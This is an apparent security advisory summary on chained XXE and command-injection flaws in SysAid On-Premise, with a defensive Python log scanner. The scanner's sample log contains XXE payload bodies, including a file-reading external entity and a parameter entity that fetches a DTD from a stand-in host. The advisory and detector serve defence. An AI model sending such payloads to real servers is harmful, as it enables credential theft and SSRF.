Full Report
Cybersecurity researchers have disclosed multiple security flaws in the on-premise version of SysAid IT support software that could be exploited to achieve pre-authenticated remote code execution with elevated privileges. The vulnerabilities, tracked as CVE-2025-2775, CVE-2025-2776, and CVE-2025-2777, have all been described as XML External Entity (XXE) injections, which occur when an attacker is
Analysis Summary
The following is a summarized, actionable briefing, written from a vulnerability-research perspective, based on the provided context:
# Vulnerability: Multiple Pre-Authentication RCE Flaws in SysAid On-Premise via XXE Chaining
## CVE Details
- CVE ID: CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, CVE-2025-2778
- CVSS Score: Not explicitly provided, but exploitation leading to RCE and disclosure of admin credentials implies **Critical** severity.
- CWE: XXE (XML External Entity Injection) for the first three; Command Injection for the fourth.
## Affected Systems
- Products: SysAid On-Premise IT support software
- Versions: Prior to **24.4.60 b16**
- Configurations: Any deployed on-premise instance.
## Vulnerability Description
SysAid's on-premise solution is affected by four critical vulnerabilities, three of which (CVE-2025-2775, CVE-2025-2776, and CVE-2025-2777) are **pre-authenticated XML External Entity (XXE) injections**.
1. **CVE-2025-2775 & CVE-2025-2776:** XXE flaws in the `/mdm/checkin` endpoint.
2. **CVE-2025-2777:** XXE flaw in the `/lshw` endpoint.
These XXE flaws can be leveraged to execute **Server-Side Request Forgery (SSRF)** attacks and, critically, allow an attacker to retrieve sensitive local files, such as `InitAccount.cmd`, which contains the **plaintext password** for the initial administrator account. This allows an attacker to gain full administrative access.
The XXE flaws can be **chained** with a separate, independent command injection vulnerability (**CVE-2025-2778**) to achieve **Remote Code Execution (RCE)** on the host system with elevated privileges.
## Exploitation
- Status: PoC available (combining all four flaws). The attacks are trivial to execute.
- Complexity: **Low** (Requires only a specially crafted HTTP POST request).
- Attack Vector: **Network** (Pre-authenticated, accessible remotely).
## Impact
- Confidentiality: **High** (Access to administrator credentials and sensitive system files).
- Integrity: **High** (Ability to chain into RCE allows modification of system state).
- Availability: **High** (RCE can lead to service disruption or control).
## Remediation
### Patches
- **SysAid On-Premise Version 24.4.60 b16** (Released in early March 2025). Users must upgrade to this version or newer.
### Workarounds
- No specific workarounds were detailed in the summary, but **immediate patching is strongly recommended.** Network segmentation or strict ingress filtering on endpoints related to MDM checks might offer temporary protection, though the primary fix is upgrading.
## Detection
- **Indicators of Compromise (IoCs):** Anomalous outbound connections originating from the SysAid server process (SSRF triggered through XXE), reads of sensitive local files such as `InitAccount.cmd` by the web application process, or execution of system commands not typical of IT service operations.
- **Detection Methods and Tools:** Monitoring web server logs for suspicious POST requests against `/mdm/checkin` and `/lshw` containing XML entity declarations, and monitoring for file access to configuration files like `InitAccount.cmd`.
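As an added example (not SysAid's code and not part of the watchTowr research), the following Python script implements the log check described above: it flags POST requests to `/mdm/checkin` and `/lshw` whose bodies carry a DOCTYPE or entity declaration. Standard web-server access logs record only the request line, so the bodies have to come from a reverse proxy or WAF that logs them; the JSON-lines format and the field names `src`, `method`, `path` and `body` are assumptions, and the sample records are constructed.

```python
"""Constructed detection example (not SysAid's or watchTowr's code).

Assumes a reverse proxy or WAF in front of SysAid that logs each request as
one JSON object per line with the keys src, method, path and body. The key
names and log format are assumptions; the endpoint paths come from the
advisory above.
"""
import json
import re
from dataclasses import dataclass, field

# Endpoints the advisory names as carrying the XXE flaws.
WATCHED_PATHS = {"/mdm/checkin", "/lshw"}

# A DTD in a request body is the precondition for XXE; an entity declared
# with SYSTEM or PUBLIC (general or parameter entity) is the stronger signal.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
EXTERNAL_ENTITY_RE = re.compile(r"<!ENTITY\s+%?\s*\w+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
ANY_ENTITY_RE = re.compile(r"<!ENTITY\b", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    src: str
    path: str
    reasons: list = field(default_factory=list)


def xxe_indicators(body: str) -> list:
    """Return human-readable reasons a request body looks like an XXE attempt."""
    reasons = []
    if DOCTYPE_RE.search(body):
        reasons.append("DOCTYPE declaration in request body")
    if EXTERNAL_ENTITY_RE.search(body):
        reasons.append("external entity (SYSTEM/PUBLIC) declared")
    elif ANY_ENTITY_RE.search(body):
        reasons.append("entity declaration in request body")
    return reasons


def scan_log(lines) -> list:
    """Flag POST requests to the watched endpoints whose body carries XXE indicators."""
    findings = []
    for line_no, raw in enumerate(lines, start=1):
        raw = raw.strip()
        if not raw:
            continue
        try:
            rec = json.loads(raw)
        except json.JSONDecodeError:
            continue  # malformed line: skip it rather than abort the scan
        path = rec.get("path", "").split("?", 1)[0]  # ignore query string
        if rec.get("method") != "POST" or path not in WATCHED_PATHS:
            continue
        reasons = xxe_indicators(rec.get("body", ""))
        if reasons:
            findings.append(Finding(line_no, rec.get("src", "?"), path, reasons))
    return findings


# Constructed sample log: a benign check-in, two bodies carrying DTD/entity
# declarations against the watched endpoints, a DTD on an unwatched path,
# a GET with no body, and one malformed line.
SAMPLE_LOG = r'''
{"src":"10.0.0.5","method":"POST","path":"/mdm/checkin","body":"<?xml version=\"1.0\"?><checkin><udid>constructed</udid></checkin>"}
{"src":"203.0.113.7","method":"POST","path":"/mdm/checkin","body":"<?xml version=\"1.0\"?><!DOCTYPE x [<!ENTITY xxe SYSTEM \"file:///constructed/placeholder\">]><checkin>&xxe;</checkin>"}
{"src":"203.0.113.7","method":"POST","path":"/lshw?v=1","body":"<!DOCTYPE x [<!ENTITY % p SYSTEM \"http://dtd.example.invalid/x.dtd\">%p;]><lshw/>"}
{"src":"10.0.0.9","method":"POST","path":"/api/tickets","body":"<!DOCTYPE t [<!ENTITY e \"text\">]><t>&e;</t>"}
{"src":"10.0.0.5","method":"GET","path":"/lshw","body":""}
not a json line
'''.strip().splitlines()


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.src} POST {f.path}: {'; '.join(f.reasons)}")
```

On the constructed sample the scan reports lines 2 and 3 only: the benign check-in has no DTD, the DTD on `/api/tickets` is outside the watched endpoints, and the GET has no body. Any DOCTYPE on these endpoints is worth an alert, since legitimate MDM check-ins and hardware reports have no reason to declare entities; the SYSTEM/PUBLIC distinction only orders the triage.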
## References
- Vendor Advisory (Patch Information): hxxps://documentation.sysaid.com/docs/24-40-60
- Exploitation Details/Research: hxxps://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/
- Proof-of-Concept (PoC): hxxps://github.com/watchtowrlabs/watchTowr-vs-SysAid-PreAuth-RCE-Chain